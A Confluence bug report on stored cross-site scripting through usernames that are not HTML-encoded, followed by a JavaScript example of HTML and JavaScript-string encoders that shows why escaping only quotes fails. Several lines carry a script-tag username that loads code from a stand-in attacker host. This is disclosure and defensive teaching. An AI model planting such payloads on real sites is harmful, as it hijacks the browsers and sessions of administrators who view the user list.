When signing up for an account, it is possible to enter a username like "<script src=http://drevil.com/xss>fred</script>". Confluence will accept this, and on certain pages, render it as raw HTML to the user, opening the possibility of cross-site scripting (XSS) attacks.

Two places I've spotted the raw HTML so far:

• Most prominently, when an admin goes to Manage Users -> Show All Users, and the username displays in the list, the raw HTML is rendered.
• When editing a page created by such a user, the togglePermissions() JavaScript will display it, breaking later tags:

    if ($('edit-personal').checked) $('editPermission').value = "<script src=http://drevil.com/xss>fred</script>";
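The two places named in the report are different output contexts (an HTML table cell and a JavaScript string inside an inline script block), and each needs its own encoder. The following is an added example, not Confluence's code or Atlassian's fix; `renderUserRow`, `renderToggleScript` and the other function names are hypothetical, and the sample username is the one quoted in the report.

```javascript
// Constructed sample input: the username quoted in the report.
const USERNAME = '<script src=http://drevil.com/xss>fred</script>';

const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// HTML text/attribute context (the "Show All Users" table cell).
function encodeForHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// JavaScript string literal inside an inline <script> block (the
// togglePermissions() case). Everything outside a small safe set becomes
// \uXXXX, so neither a quote nor "</script>" survives in the output.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 _.,-]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Insufficient for this context: escapes quotes and backslashes only.
function escapeQuotesOnly(value) {
  return String(value).replace(/[\\"]/g, (c) => '\\' + c);
}

// Hypothetical template helpers standing in for the two pages.
function renderUserRow(name) {
  return '<td>' + encodeForHtml(name) + '</td>';
}
function renderToggleScript(name, encode) {
  return '<script>if ($(\'edit-personal\').checked) ' +
    '$(\'editPermission\').value = "' + encode(name) + '";</script>';
}

// What an HTML parser treats as the script body: it ends at the first
// "</script", whether or not that falls inside a JavaScript string.
function scriptBodySeenByParser(html) {
  const start = html.indexOf('<script>') + '<script>'.length;
  const end = html.toLowerCase().indexOf('</script', start);
  return html.slice(start, end);
}

function demo() {
  return {
    row: renderUserRow(USERNAME),
    weak: scriptBodySeenByParser(renderToggleScript(USERNAME, escapeQuotesOnly)),
    safe: scriptBodySeenByParser(renderToggleScript(USERNAME, encodeForJsString)),
  };
}
console.log(demo());
```

With quote-only escaping the parser ends the script block in the middle of the string, which is the "breaking later tags" effect described above; with the `\uXXXX` encoder the statement stays intact and the browser still assigns the original username to the field.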

            [CONFSERVER-7615] XSS bug: usernames not HTML-encoded in all places

            Owen made changes -
            Status Original: Resolved [ 5 ] New: Closed [ 6 ]

              ckiehl Chris Kiehl
              7ee5c68a815f Jeff Turner